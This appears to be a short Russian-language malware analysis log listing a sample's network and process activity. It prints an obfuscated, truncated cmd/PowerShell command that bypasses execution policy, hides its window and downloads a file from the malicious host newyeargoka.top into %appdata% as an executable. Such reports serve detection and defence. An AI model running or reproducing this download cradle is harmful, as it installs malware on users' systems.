Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Powe^R^SHEl^L^.Ex^E -EXE^C^UTIOnp^o^lICY ^b^y^PA^sS^ -n^O^P^r^OFIle -w^iNdoWS^tyLE^ H^i^dDE^n ^(nEw-objEct sYST^Em.N^E^t^.WebcLiEN^t).DOw^N^lO^Ad^Fil^e^(^'http://newyeargoka....
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- DNS ASK ne###argoka.top
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- '<SYSTEM32>\cmd.exe' /C "Powe^R^SHEl^L^.Ex^E -EXE^C^UTIOnp^o^lICY ^b^y^PA^sS^ -n^O^P^r^OFIle -w^iNdoWS^tyLE^ H^i^dDE^n ^(nEw-objEct sYST^Em.N^E^t^.WebcLiEN^t).DOw^N^lO^Ad^Fil^e^(^'http://newyeargoka.... (со скрытым окном)